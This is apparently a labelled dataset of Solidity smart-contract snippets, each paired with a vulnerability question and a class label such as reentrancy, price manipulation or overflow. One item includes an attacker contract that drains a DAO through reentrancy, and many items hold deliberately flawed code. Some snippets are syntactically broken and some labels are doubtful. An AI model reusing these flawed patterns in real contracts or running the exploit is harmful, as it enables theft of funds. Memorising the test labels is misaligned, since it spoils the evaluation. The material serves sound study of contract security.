6         uint64 winningId; 
7         bool drawingPhase; 
8         }
    
9         function enterDrawingPhase() external {
10                 drawingPhase = true;
11         }

12         function draw(uint64 id) external {
13                 require(winningId == 0, "already drawn");
14                 require(id != 0, "invalid winning number");
15                 winningId = id;
16         }
17         function multiBuy(uint[] ids, uint[] amounts)
18         external {
19                 require(winningId == 0, "already drawn");             
20                 uint totalAmount = 0;
21                 for (int i = 0; i < ids.length; i++) {
22                 tickets[msg.sender][ids[i]] += amounts[i];
23                 totalAmount += amounts[i];
24         }
25              receivePayment(msg.sender, totalAmount);
26         }
27  }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24<0.6.0;
2 
3 contract SimpleDAO {
4     mapping (address => uint) public credit;
5     constructor() public {
6     }
7     function donate(address to, uint amount) payable public {
8         credit[to] += amount;
9     }
10     function queryCredit(address to) public view returns (uint) {
11         return credit[to];
12     }
13     function withdraw() public {
14         uint oldBal = address(this).balance; 
15         address payable sender = msg.sender;
16         uint balSender = msg.sender.balance; // translated OK
17         uint amount = credit[msg.sender];
18         if (amount > 0) {
19             sender.transfer(amount); // VeriSol bug #185 (can't handle msg.sender.transfer)
20             credit[msg.sender] = 0;  // BUG: 
21         }
22         uint bal = address(this).balance;       
23     }
24 }
25 
26 contract Mallory {
27     SimpleDAO public dao;
28     uint count;
29     constructor (address daoAddr) public payable {
30         count = 0;
31         dao = SimpleDAO(daoAddr);
32         require(dao.queryCredit(address(this)) == 0);
33         require(address(this).balance == 1);
34     }
35     function () payable external {
36         if (count < 2) {
37             count ++;
38             dao.withdraw();
39         }
40     }
41     function donate() public {        
42         dao.donate(address(this), address(this).balance);  //should this not be a send(this.balance)? 
43     }
44     function getJackpot() public {
45         dao.withdraw();
46     }
47 }  
What are the vulnerabilities in the contract?
reentrancy
<end of text>
1 ragma solidity ^0.5.0;
2 
3 import "./IERC20.sol";
4 import "./SafeMath.sol";
5 import "./Libraries/VeriSolContracts.sol"; //change 
6 
7 
8 contract ERC20 is IERC20 {
9 
10     mapping (address => uint256) private _balances;
11     uint256 private _totalSupply;
12 
13     constructor (uint256 totalSupply) public {
14        require(msg.sender != address(0));
15        _totalSupply = totalSupply;
16        _balances[msg.sender] = totalSupply;
17     }
18 
19 
20     function totalSupply() public view returns (uint256) {
21         return _totalSupply;
22     }
23 
24     function balanceOf(address account) public view returns (uint256) {
25         return _balances[account];
26     }
27 
28     function transfer(address recipient, uint256 amount) public returns (bool) {
29         uint oldBalanceSender = _balances[msg.sender];
30 
31         _transfer(msg.sender, recipient, amount);       
32         return true;
33     }
34 
35   
36     function _transfer(address sender, address recipient, uint256 amount) internal {
37         require(sender != address(0), "ERC20: transfer from the zero address");
38         require(recipient != address(0), "ERC20: transfer to the zero address");
39         require(_balances[sender] >= amount);
40 
41         _balances[sender] = SafeMath.sub(_balances[sender], amount);
42                         
43                 _balances[recipient] = _balances[recipient] + amount; // nosafemath //_balances[recipient] = _balances[recipient].add(amount);
44     }
45 }
What are the vulnerabilities in the contract?
incorrect ownership/visibility
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;
2 
3 contract AssertFalse {
4 
5     function test1() public {
6               _;
7 
8     }
9 
10     function test2() public {
11         assert (!(1 > 2));
12     }
13 
What are the vulnerabilities in the contract?
healthy 
<end of text>
1  // SPDX-License-Identifier: MIT
2  pragma solidity >=0.4.24 <0.6.0;
3  
4  contract overflow{
5     function transferProxy (address from, address to, uint
6     value, uint fee) {  
7         if (balance[from] < fee + value) revert();
8 
9         if (balance[to] + value < balance[to] ||
10         balance[msg.sender] + fee < balance[msg.sender])
11         revert();
12 
13         balance[to] += value;
14         balance[msg.sender] += fee;
15         balance[from] -= value + fee;
16     }
What are the vulnerabilities in the contract?
integer overflow/underflow
<end of text>
1  // SPDX-License-Identifier: MIT
2  pragma solidity >=0.4.24 <0.6.0;
3  
4  contract testSuicide{
5         function initMultiowned(address[] _owners,
6                             uint _required){
7         if (m_numOwners > 0) throw;
8         m_numOwners = _owners.length + 1;
9         m_owners[1] = uint(msg.sender);
10         m_ownerIndex[uint(msg.sender)] = 1;
11         m_required = _required;
12 
13         }
14 
15         function kill(address _to) {
16             uint ownerIndex = m_ownerIndex[uint(msg.sender)];
17             if (ownerIndex == 0) return;
18             var pending = m_pending[sha3(msg.data)];
19             if (pending.yetNeeded == 0) {
20             pending.yetNeeded = m_required;
21             pending.ownersDone = 0;
22             }
23             uint ownerIndexBit = 2**ownerIndex;
24             if (pending.ownersDone   ownerIndexBit == 0) {
25             if (pending.yetNeeded <= 1)
26                 suicide(_to);
27             else {
28                 pending.yetNeeded--;
29                 pending.ownersDone |= ownerIndexBit;
30             }
31             }
32         }
33  }
What are the vulnerabilities in the contract?
suicidal contracts
<end of text>
1 / SPDX-License-Identifier: MIT
2  pragma solidity >=0.4.24 <0.6.0;
3  
4  contract ether{
5         function payout(address[] recipients,
6                         uint256[] amounts) {
7         require(recipients.length==amounts.length);
8         for (uint i = 0; i < recipients.length; i++) {
9         recipients[i].send(amounts[i]);
10         }
11         }
12  }
What are the vulnerabilities in the contract?
ether leakage
<end of text>
1   // SPDX-License-Identifier: MIT
2 pragma solidity ^0.6.8;
3 pragma experimental ABIEncoderV2;
4 
5 
6 contract Chain  {
7   IStakingBank public immutable stakingBank;
8 
9   event LogMint(address indexed minter, uint256 blockId, uint256 staked, uint256 power);
10   event LogVoter(uint256 indexed blockId, address indexed voter, uint256 vote);
11 
12   IStakingBank public immutable stakingBank;
13 
14   constructor(
15     address _contractRegistry,
16     uint16 _padding,
17     uint16 _requiredSignatures
18   ) public BaseChain(_contractRegistry, _padding, _requiredSignatures) {
19     stakingBank = stakingBankContract();
20   }
21 
22   function submit(
23     uint32 _dataTimestamp,
24     bytes32 _root,
25     bytes32[] memory _keys,
26     uint256[] memory _values,
27     uint8[] memory _v,
28     bytes32[] memory _r,
29     bytes32[] memory _s
30   ) public {  
31     uint32 lastBlockId = getLatestBlockId();
32     uint32 dataTimestamp = squashedRoots[lastBlockId].extractTimestamp();
33 
34 
35     require(_keys.length == _values.length, "numbers of keys and values not the same");
36 
37     bytes memory testimony = abi.encodePacked(_dataTimestamp, _root);
38 
39     for (uint256 i = 0; i < _keys.length; i++) {
40       require(uint224(_values[i]) == _values[i], "FCD overflow");
41       fcds[_keys[i]] = FirstClassData(uint224(_values[i]), _dataTimestamp);
42       testimony = abi.encodePacked(testimony, _keys[i], _values[i]);
43     }
44 
45     bytes32 affidavit = keccak256(testimony);
46     uint256 power = 0;
47 
48     uint256 staked = stakingBank.totalSupply();
49     address prevSigner = address(0x0);
50 
51     uint256 i = 0;
52 
53     for (; i < _v.length; i++) {
54       address signer = recoverSigner(affidavit, _v[i], _r[i], _s[i]);
55       uint256 balance = stakingBank.balanceOf(signer);
56 
57       require(prevSigner < signer, "validator included more than once");
58       prevSigner = signer;
59       if (balance == 0) continue;
60 
61       emit LogVoter(lastBlockId + 1, signer, balance);
62       power += balance; 
63     }
64 
65     require(i >= requiredSignatures, "not enough signatures");
66 
67     squashedRoots[lastBlockId + 1] = _root.makeSquashedRoot(_dataTimestamp);
68     blocksCount++;
69 
70     emit LogMint(msg.sender, lastBlockId + 1, staked, power);
71   }
72 
73   function getLeaderIndex(uint256 _numberOfValidators, uint256 _timestamp) public view returns (uint256) {
74     uint32 latestBlockId = getLatestBlockId();
75 
76     
77     uint256 validatorIndex = latestBlockId +
78       (_timestamp - squashedRoots[latestBlockId].extractTimestamp()) / (padding + 1);
79 
80     return uint16(validatorIndex % _numberOfValidators);
81   }
82 
83   function getLeaderAddressAtTime(uint256 _timestamp) public view returns (address) {
84     uint256 numberOfValidators = stakingBank.getNumberOfValidators();
85 
86     if (numberOfValidators == 0) {
87       return address(0x0);
88     }
89 
90     uint256 validatorIndex = getLeaderIndex(numberOfValidators, _timestamp);
91 
92     return stakingBank.addresses(validatorIndex);
93   }
94 }
What are the vulnerabilities in the contract?
incorrect visibility/ownership
<end of text>
1 //SPDX-License-Identifier: GPL-3.0
2 pragma solidity 0.8.4;
3 
4 import "../libraries/MathLib.sol";
5 import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
6 import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
7 import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
8 import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
9 import "../interfaces/IExchangeFactory.sol";
10 
11 
12 contract Exchange is ERC20, ReentrancyGuard {
13     using MathLib for uint256;
14     using SafeERC20 for IERC20;
15 
16     address public immutable baseToken; // address of ERC20 base token (elastic or fixed supply)
17     address public immutable quoteToken; // address of ERC20 quote token (WETH or a stable coin w/ fixed supply)
18     address public immutable exchangeFactoryAddress;
19 
20     uint256 public constant TOTAL_LIQUIDITY_FEE = 30; // fee provided to liquidity providers + DAO in basis points
21 
22     MathLib.InternalBalances public internalBalances =
23         MathLib.InternalBalances(0, 0, 0);
24 
25     event AddLiquidity(
26         address indexed liquidityProvider,
27         uint256 baseTokenQtyAdded,
28         uint256 quoteTokenQtyAdded
29     );
30     event RemoveLiquidity(
31         address indexed liquidityProvider,
32         uint256 baseTokenQtyRemoved,
33         uint256 quoteTokenQtyRemoved
34     );
35     event Swap(
36         address indexed sender,
37         uint256 baseTokenQtyIn,
38         uint256 quoteTokenQtyIn,
39         uint256 baseTokenQtyOut,
40         uint256 quoteTokenQtyOut
41     );
42 
43 
44     function isNotExpired(uint256 _expirationTimeStamp) internal view {
45         require(_expirationTimeStamp >= block.timestamp, "Exchange: EXPIRED");
46     }
47 
48   
49     constructor(
50         string memory _name,
51         string memory _symbol,
52         address _baseToken,
53         address _quoteToken,
54         address _exchangeFactoryAddress
55     ) ERC20(_name, _symbol) {
56         baseToken = _baseToken;
57         quoteToken = _quoteToken;
58         exchangeFactoryAddress = _exchangeFactoryAddress;
59     }
60 
61 
62     function addLiquidity(
63         uint256 _baseTokenQtyDesired,
64         uint256 _quoteTokenQtyDesired,
65         uint256 _baseTokenQtyMin,
66         uint256 _quoteTokenQtyMin,
67         address _liquidityTokenRecipient,
68         uint256 _expirationTimestamp
69     ) external nonReentrant() {
70         isNotExpired(_expirationTimestamp);
71 
72         MathLib.TokenQtys memory tokenQtys =
73             MathLib.calculateAddLiquidityQuantities(
74                 _baseTokenQtyDesired,
75                 _quoteTokenQtyDesired,
76                 _baseTokenQtyMin,
77                 _quoteTokenQtyMin,
78                 IERC20(baseToken).balanceOf(address(this)),
79                 IERC20(quoteToken).balanceOf(address(this)),
80                 this.totalSupply(),
81                 internalBalances
82             );
83         //here is the buggy line 
84         internalBalances.kLast =
85             internalBalances.baseTokenReserveQty /
86             internalBalances.quoteTokenReserveQty;
87 
88         if (tokenQtys.liquidityTokenFeeQty > 0) {
89             // mint liquidity tokens to fee address for k growth.
90             _mint(
91                 IExchangeFactory(exchangeFactoryAddress).feeAddress(),
92                 tokenQtys.liquidityTokenFeeQty
93             );
94         }
95         _mint(_liquidityTokenRecipient, tokenQtys.liquidityTokenQty); // mint liquidity tokens to recipient
96 
97         if (tokenQtys.baseTokenQty != 0) {
98             bool isExchangeEmpty =
99                 IERC20(baseToken).balanceOf(address(this)) == 0;
100 
101             // transfer base tokens to Exchange
102             IERC20(baseToken).safeTransferFrom(
103                 msg.sender,
104                 address(this),
105                 tokenQtys.baseTokenQty
106             );
107 
108             if (isExchangeEmpty) {
109                 require(
110                     IERC20(baseToken).balanceOf(address(this)) ==
111                         tokenQtys.baseTokenQty,
112                     "Exchange: FEE_ON_TRANSFER_NOT_SUPPORTED"
113                 );
114             }
115         }
116 
117         if (tokenQtys.quoteTokenQty != 0) {
118             // transfer quote tokens to Exchange
119             IERC20(quoteToken).safeTransferFrom(
120                 msg.sender,
121                 address(this),
122                 tokenQtys.quoteTokenQty
123             );
124         }
125 
126         emit AddLiquidity(
127             msg.sender,
128             tokenQtys.baseTokenQty,
129             tokenQtys.quoteTokenQty
130         );
131     }
132 
133    
134     function removeLiquidity(
135         uint256 _liquidityTokenQty,
136         uint256 _baseTokenQtyMin,
137         uint256 _quoteTokenQtyMin,
138         address _tokenRecipient,
139         uint256 _expirationTimestamp
140     ) external nonReentrant() {
141         isNotExpired(_expirationTimestamp);
142         require(this.totalSupply() > 0, "Exchange: INSUFFICIENT_LIQUIDITY");
143         require(
144             _baseTokenQtyMin > 0 && _quoteTokenQtyMin > 0,
145             "Exchange: MINS_MUST_BE_GREATER_THAN_ZERO"
146         );
147 
148     
149         uint256 baseTokenReserveQty =
150             IERC20(baseToken).balanceOf(address(this));
151         uint256 quoteTokenReserveQty =
152             IERC20(quoteToken).balanceOf(address(this));
153 
154         uint256 totalSupplyOfLiquidityTokens = this.totalSupply();
155         // calculate any DAO fees here.
156         uint256 liquidityTokenFeeQty =
157             MathLib.calculateLiquidityTokenFees(
158                 totalSupplyOfLiquidityTokens,
159                 internalBalances
160             );
161 
162         totalSupplyOfLiquidityTokens += liquidityTokenFeeQty;
163 
164         uint256 baseTokenQtyToReturn =
165             (_liquidityTokenQty * baseTokenReserveQty) /
166                 totalSupplyOfLiquidityTokens;
167         uint256 quoteTokenQtyToReturn =
168             (_liquidityTokenQty * quoteTokenReserveQty) /
169                 totalSupplyOfLiquidityTokens;
170 
171         require(
172             baseTokenQtyToReturn >= _baseTokenQtyMin,
173             "Exchange: INSUFFICIENT_BASE_QTY"
174         );
175 
176         require(
177             quoteTokenQtyToReturn >= _quoteTokenQtyMin,
178             "Exchange: INSUFFICIENT_QUOTE_QTY"
179         );
180 
181         uint256 baseTokenQtyToRemoveFromInternalAccounting =
182             (_liquidityTokenQty * internalBalances.baseTokenReserveQty) /
183                 totalSupplyOfLiquidityTokens;
184 
185         internalBalances
186             .baseTokenReserveQty -= baseTokenQtyToRemoveFromInternalAccounting;
187 
188 
189         if (quoteTokenQtyToReturn > internalBalances.quoteTokenReserveQty) {
190             internalBalances.quoteTokenReserveQty = 0;
191         } else {
192             internalBalances.quoteTokenReserveQty -= quoteTokenQtyToReturn;
193         }
194 
195         internalBalances.kLast =
196             internalBalances.baseTokenReserveQty *
197             internalBalances.quoteTokenReserveQty;
198 
199         if (liquidityTokenFeeQty > 0) {
200             _mint(
201                 IExchangeFactory(exchangeFactoryAddress).feeAddress(),
202                 liquidityTokenFeeQty
203             );
204         }
205 
206         _burn(msg.sender, _liquidityTokenQty);
207         IERC20(baseToken).safeTransfer(_tokenRecipient, baseTokenQtyToReturn);
208         IERC20(quoteToken).safeTransfer(_tokenRecipient, quoteTokenQtyToReturn);
209         emit RemoveLiquidity(
210             msg.sender,
211             baseTokenQtyToReturn,
212             quoteTokenQtyToReturn
213         );
214     }
215 
216     function swapBaseTokenForQuoteToken(
217         uint256 _baseTokenQty,
218         uint256 _minQuoteTokenQty,
219         uint256 _expirationTimestamp
220     ) external nonReentrant() {
221         isNotExpired(_expirationTimestamp);
222         require(
223             _baseTokenQty > 0 && _minQuoteTokenQty > 0,
224             "Exchange: INSUFFICIENT_TOKEN_QTY"
225         );
226 
227         uint256 quoteTokenQty =
228             MathLib.calculateQuoteTokenQty(
229                 _baseTokenQty,
230                 _minQuoteTokenQty,
231                 TOTAL_LIQUIDITY_FEE,
232                 internalBalances
233             );
234 
235         IERC20(baseToken).safeTransferFrom(
236             msg.sender,
237             address(this),
238             _baseTokenQty
239         );
240 
241         IERC20(quoteToken).safeTransfer(msg.sender, quoteTokenQty);
242         emit Swap(msg.sender, _baseTokenQty, 0, 0, quoteTokenQty);
243     }
244 
245 
246     function swapQuoteTokenForBaseToken(
247         uint256 _quoteTokenQty,
248         uint256 _minBaseTokenQty,
249         uint256 _expirationTimestamp
250     ) external nonReentrant() {
251         isNotExpired(_expirationTimestamp);
252         require(
253             _quoteTokenQty > 0 && _minBaseTokenQty > 0,
254             "Exchange: INSUFFICIENT_TOKEN_QTY"
255         );
256 
257         uint256 baseTokenQty =
258             MathLib.calculateBaseTokenQty(
259                 _quoteTokenQty,
260                 _minBaseTokenQty,
261                 IERC20(baseToken).balanceOf(address(this)),
262                 TOTAL_LIQUIDITY_FEE,
263                 internalBalances
264             );
265 
266         IERC20(quoteToken).safeTransferFrom(
267             msg.sender,
268             address(this),
269             _quoteTokenQty
270         );
271 
272         IERC20(baseToken).safeTransfer(msg.sender, baseTokenQty);
273         emit Swap(msg.sender, 0, _quoteTokenQty, baseTokenQty, 0);
274     }
275 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity >=0.5.0;

3 interface IERC20 {
4     event Approval(address indexed owner, address indexed spender, uint value);
5     event Transfer(address indexed from, address indexed to, uint value);

6     function name() external view returns (string memory);
7     function symbol() external view returns (string memory);
8     function decimals() external view returns (uint8);
9     function totalSupply() external view returns (uint);
10     function balanceOf(address owner) external view returns (uint);
11     function allowance(address owner, address spender) external view returns (uint);

12     function approve(address spender, uint value) external returns (bool);
13     function transfer(address to, uint value) external returns (bool);
14     function transferFrom(address from, address to, uint value) external returns (bool);
15 }

16 interface IUniswapV2Pair {
17     event Approval(address indexed owner, address indexed spender, uint value);
18     event Transfer(address indexed from, address indexed to, uint value);

19     function name() external pure returns (string memory);
20     function symbol() external pure returns (string memory);
21     function decimals() external pure returns (uint8);
22     function totalSupply() external view returns (uint);
23     function balanceOf(address owner) external view returns (uint);
24     function allowance(address owner, address spender) external view returns (uint);

25     function approve(address spender, uint value) external returns (bool);
26     function transfer(address to, uint value) external returns (bool);
27     function transferFrom(address from, address to, uint value) external returns (bool);

28     function DOMAIN_SEPARATOR() external view returns (bytes32);
29     function PERMIT_TYPEHASH() external pure returns (bytes32);
30     function nonces(address owner) external view returns (uint);

31     function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

32     event Mint(address indexed sender, uint amount0, uint amount1);
33     event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
34     event Swap(
35         address indexed sender,
36         uint amount0In,
37         uint amount1In,
38         uint amount0Out,
39         uint amount1Out,
40         address indexed to
41     );
42     event Sync(uint112 reserve0, uint112 reserve1);

43     function MINIMUM_LIQUIDITY() external pure returns (uint);
44     function factory() external view returns (address);
45     function token0() external view returns (address);
46     function token1() external view returns (address);
47     function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
48     function price0CumulativeLast() external view returns (uint);
49     function price1CumulativeLast() external view returns (uint);
50     function kLast() external view returns (uint);

51     function mint(address to) external returns (uint liquidity);
52     function burn(address to) external returns (uint amount0, uint amount1);
53     function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
54     function skim(address to) external;
55     function sync() external;

56     function initialize(address, address) external;
57 }

58 contract ExchangeTokens {
59         IERC20 public WETH;
60         IERC20 public USDC;
61         IUniswapV2Pair public pair; 
62         mapping(address => uint) public debt;
63         mapping(address => uint) public collateral;

64         function liquidate(address user) public {
65             uint dAmount = debt[user];
66             uint cAmount = collateral[user];
67             require(getPrice() * cAmount * 80 / 100 < dAmount,
68             "the given user’s fund cannot be liquidated");
69             address _this = address(this);
70             USDC.transferFrom(msg.sender, _this, dAmount);
71             WETH.transferFrom(_this, msg.sender, cAmount);
72         }
73         function  getPrice() public payable returns (uint) {
                 
74             return (USDC.balanceOf(address(pair)) /
75             WETH.balanceOf(address(pair)));
76      }
77  }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1  // SPDX-License-Identifier: MIT
2  pragma solidity >=0.5.0;
3 
4  contract Swap {
5          IERC20 public WEI;
6          IERC20 public USD;
7          IUniswapV2Pair public pair; 
8          mapping(address => uint) public debt;
9          mapping(address => uint) public collateral;
10 
11          function liquidate(address user) public {
12              uint dAmount = debt[user];
13              uint cAmount = collateral[user];
14             require(getPrice() * cAmount * 80 / 100 < dAmount,
15              "the given user’s fund cannot be liquidated");
16             address _this = address(this);
17            USD.transferFrom(msg.sender, _this, dAmount);
18             WEI.transferFrom(_this, msg.sender, cAmount);
19        }
20          function  calculatePrice() public payable returns (uint) { 
21 
22 
23                     return (USD.balanceOf(address(pair)) /
24              WEI.balanceOf(address(pair)));
25      }
26   }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity 0.8.4;
3 import "./IOracle.sol";
4 
5 
6 interface IAggregator {
7     function latestAnswer() external view returns (int256 answer);
8 }
9 
10 interface IJoePair {
11     function getReserves() external view returns ( uint112 _reserve0, uint112 _reserve1, uint32 _blockTimestampLast);
12     function totalSupply() external view returns (uint256);
13 }
14 
15 contract JLPWAVAXUSDCOracle is IOracle {
16     IJoePair constant public joePair = IJoePair(0xf4003F4efBE8691B60249E6afbD307aBE7758adb);
17     IAggregator constant public AVAX = IAggregator(0x0A77230d17318075983913bC2145DB16C7366156);
18     IAggregator constant public USDC = IAggregator(0xF096872672F44d6EBA71458D74fe67F9a77a23B9);
19 
20     function _get() internal view returns (uint256) {
21 
22         uint256 usdcPrice = uint256(USDC.latestAnswer());
23         uint256 avaxPrice = uint256(AVAX.latestAnswer());
24         (uint112 wavaxReserve, uint112 usdcReserve, ) = joePair.getReserves();
25 
26         uint256 price = (wavaxReserve * avaxPrice + usdcReserve * usdcPrice * 1e12) / uint256(joePair.totalSupply());
27 
28         return 1e26 / price;
29     }
30 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity 0.8.4;
3 import "./IOracle.sol";
4 
5 
6 interface IAggregator {
7     function latestAnswer() external view returns (int256 answer);
8 }
9 
10 interface IJoePair {
11     function getReserves() external view returns ( uint112 _reserve0, uint112 _reserve1, uint32 _blockTimestampLast);
12     function totalSupply() external view returns (uint256);
13 }
14 
15 contract JLPWAVAXUSDCOracle is IOracle {
16     IJoePair constant public joePair = IJoePair(0xf4003F4efBE8691B60249E6afbD307aBE7758adb);
17     IAggregator constant public AVAX = IAggregator(0x0A77230d17318075983913bC2145DB16C7366156);
18     IAggregator constant public USDC = IAggregator(0xF096872672F44d6EBA71458D74fe67F9a77a23B9);
19 
20     function _get() internal view returns (uint256) {
21 
22         uint256 usdcPrice = uint256(USDC.latestAnswer());
23         uint256 avaxPrice = uint256(AVAX.latestAnswer());
24         (uint112 wavaxReserve, uint112 usdcReserve, ) = joePair.getReserves();
25 
26         uint256 price = (wavaxReserve * avaxPrice + usdcReserve * usdcPrice * 1e12) / uint256(joePair.totalSupply());
27 
28         return 1e26 / price;
29     }
30 
31    function get(bytes calldata) public view override returns (bool, uint256) {
32         return (true, _get());
33     }
34 
35 
36     function peek(bytes calldata) public view override returns (bool, uint256) {
37         return (true, _get());
38     }
39 
40     function peekSpot(bytes calldata data) external view override returns (uint256 rate) {
41         (, rate) = peek(data);
42     }
43 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: MIT
2 
3 pragma solidity 0.6.12;
4 
5 import "@openzeppelin/contracts/math/SafeMath.sol";
6 import "@openzeppelin/contracts/token/ERC20/SafeERC20.sol";
7 import "../LPToken.sol";
8 import "../interfaces/ISwap.sol";
9 import "../MathUtils.sol";
10 import "../SwapUtils.sol";
11 
12 
13 library MetaSwapUtils {
14     using SafeERC20 for IERC20;
15     using SafeMath for uint256;
16     using MathUtils for uint256;
17     using AmplificationUtils for SwapUtils.Swap;
18 
19     /*** EVENTS ***/
20 
21     event TokenSwap(
22         address indexed buyer,
23         uint256 tokensSold,
24         uint256 tokensBought,
25         uint128 soldId,
26         uint128 boughtId
27     );
28     event TokenSwapUnderlying(
29         address indexed buyer,
30         uint256 tokensSold,
31         uint256 tokensBought,
32         uint128 soldId,
33         uint128 boughtId
34     );
35     event AddLiquidity(
36         address indexed provider,
37         uint256[] tokenAmounts,
38         uint256[] fees,
39         uint256 invariant,
40         uint256 lpTokenSupply
41     );
42     event RemoveLiquidityOne(
43         address indexed provider,
44         uint256 lpTokenAmount,
45         uint256 lpTokenSupply,
46         uint256 boughtId,
47         uint256 tokensBought
48     );
49     event RemoveLiquidityImbalance(
50         address indexed provider,
51         uint256[] tokenAmounts,
52         uint256[] fees,
53         uint256 invariant,
54         uint256 lpTokenSupply
55     );
56     event NewAdminFee(uint256 newAdminFee);
57     event NewSwapFee(uint256 newSwapFee);
58     event NewWithdrawFee(uint256 newWithdrawFee);
59 
60     struct MetaSwap {
61         ISwap baseSwap;
62         uint256 baseVirtualPrice;
63         uint256 baseCacheLastUpdated;
64         IERC20[] baseTokens;
65     }
66 
67     struct CalculateWithdrawOneTokenDYInfo {
68         uint256 d0;
69         uint256 d1;
70         uint256 newY;
71         uint256 feePerToken;
72         uint256 preciseA;
73         uint256 xpi;
74     }
75 
76     struct ManageLiquidityInfo {
77         uint256 d0;
78         uint256 d1;
79         uint256 d2;
80         LPToken lpToken;
81         uint256 totalSupply;
82         uint256 preciseA;
83         uint256 baseVirtualPrice;
84         uint256[] tokenPrecisionMultipliers;
85         uint256[] newBalances;
86     }
87 
88     struct SwapUnderlyingInfo {
89         uint256 x;
90         uint256 dx;
91         uint256 dy;
92         uint256[] tokenPrecisionMultipliers;
93         uint256[] oldBalances;
94         IERC20[] baseTokens;
95         IERC20 tokenFrom;
96         uint8 metaIndexFrom;
97         IERC20 tokenTo;
98         uint8 metaIndexTo;
99         uint256 baseVirtualPrice;
100     }
101 
102     struct CalculateSwapUnderlyingInfo {
103         uint256 baseVirtualPrice;
104         ISwap baseSwap;
105         uint8 baseLPTokenIndex;
106         uint8 baseTokensLength;
107         uint8 metaIndexTo;
108         uint256 x;
109         uint256 dy;
110     }
111 
112     uint256 private constant FEE_DENOMINATOR = 10**10;
113     uint256 public constant BASE_CACHE_EXPIRE_TIME = 10 minutes;
114     uint256 public constant BASE_VIRTUAL_PRICE_PRECISION = 10**18;
115 
116     function _calculateWithdrawOneTokenDY(
117         SwapUtils.Swap storage self,
118         uint8 tokenIndex,
119         uint256 tokenAmount,
120         uint256 baseVirtualPrice,
121         uint256 totalSupply
122     )
123         internal
124         view
125         returns (
126             uint256,
127             uint256,
128             uint256
129         )
130     {
131         // Get the current D, then solve the stableswap invariant
132         // y_i for D - tokenAmount
133         uint256[] memory xp = _xp(self, baseVirtualPrice);
134         require(tokenIndex < xp.length, "Token index out of range");
135 
136         CalculateWithdrawOneTokenDYInfo memory v =
137             CalculateWithdrawOneTokenDYInfo(0, 0, 0, 0, self._getAPrecise(), 0);
138         v.d0 = SwapUtils.getD(xp, v.preciseA);
139         v.d1 = v.d0.sub(tokenAmount.mul(v.d0).div(totalSupply));
140 
141         require(tokenAmount <= xp[tokenIndex], "Withdraw exceeds available");
142 
143         v.newY = SwapUtils.getYD(v.preciseA, tokenIndex, xp, v.d1);
144 
145         uint256[] memory xpReduced = new uint256[](xp.length);
146 
147         v.feePerToken = SwapUtils._feePerToken(self.swapFee, xp.length);
148         for (uint256 i = 0; i < xp.length; i++) {
149             v.xpi = xp[i];
150             xpReduced[i] = v.xpi.sub(
151                 (
152                     (i == tokenIndex)
153                         ? v.xpi.mul(v.d1).div(v.d0).sub(v.newY)
154                         : v.xpi.sub(v.xpi.mul(v.d1).div(v.d0))
155                 )
156                     .mul(v.feePerToken)
157                     .div(FEE_DENOMINATOR)
158             );
159         }
160         uint256 dy =
161             xpReduced[tokenIndex].sub(
162                 SwapUtils.getYD(v.preciseA, tokenIndex, xpReduced, v.d1)
163             );
164 
165         if (tokenIndex == xp.length.sub(1)) {
166             dy = dy.mul(BASE_VIRTUAL_PRICE_PRECISION).div(baseVirtualPrice);
167         }
168         dy = dy.sub(1).div(self.tokenPrecisionMultipliers[tokenIndex]);
169 
170         return (dy, v.newY, xp[tokenIndex]);
171     }
172 
173     function calculateSwap(
174         SwapUtils.Swap storage self,
175         MetaSwap storage metaSwapStorage,
176         uint8 tokenIndexFrom,
177         uint8 tokenIndexTo,
178         uint256 dx
179     ) external view returns (uint256 dy) {
180         (dy, ) = _calculateSwap(
181             self,
182             tokenIndexFrom,
183             tokenIndexTo,
184             dx,
185             _getBaseVirtualPrice(metaSwapStorage)
186         );
187     }
188 
189 //this is the buggy function
190     function _calculateSwap(
191         SwapUtils.Swap storage self,
192         uint8 tokenIndexFrom,
193         uint8 tokenIndexTo,
194         uint256 dx,
195         uint256 baseVirtualPrice
196     ) internal view returns (uint256 dy, uint256 dyFee) {
197         uint256[] memory xp = _xp(self, baseVirtualPrice);
198         require(
199             tokenIndexFrom < xp.length && tokenIndexTo < xp.length,
200             "Token index out of range"
201         );
202         uint256 x =
203             dx.mul(self.tokenPrecisionMultipliers[tokenIndexFrom]).add(
204                 xp[tokenIndexFrom]
205             );
206         uint256 y =
207             SwapUtils.getY(
208                 self._getAPrecise(),
209                 tokenIndexFrom,
210                 tokenIndexTo,
211                 x,
212                 xp
213             );
214         dy = xp[tokenIndexTo].sub(y).sub(1);
215         dyFee = dy.mul(self.swapFee).div(FEE_DENOMINATOR);
216         dy = dy.sub(dyFee).div(self.tokenPrecisionMultipliers[tokenIndexTo]);
217     }
218  
219 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
//hundred finance hack
1 pragma solidity ^0.4.11;
2 
3 
4 import "./token/ERC677.sol";
5 import "./token/ERC677Receiver.sol";
6 
7 
8 contract ERC677Token is ERC677 {
9 
10   function transferAndCall(address _to, uint _value, bytes _data)
11     public
12     returns (bool success)
13   {
14     super.transfer(_to, _value);
15     Transfer(msg.sender, _to, _value, _data);
16     if (isContract(_to)) {
17       contractFallback(_to, _value, _data);
18     }
19     return true;
20   }
21 
22 
23   // PRIVATE
24 
25   function contractFallback(address _to, uint _value, bytes _data)
26     private
27   {
28     ERC677Receiver receiver = ERC677Receiver(_to);
29     receiver.onTokenTransfer(msg.sender, _value, _data);
30   }
31 
32   function isContract(address _addr)
33     private
34     returns (bool hasCode)
35   {
36     uint length;
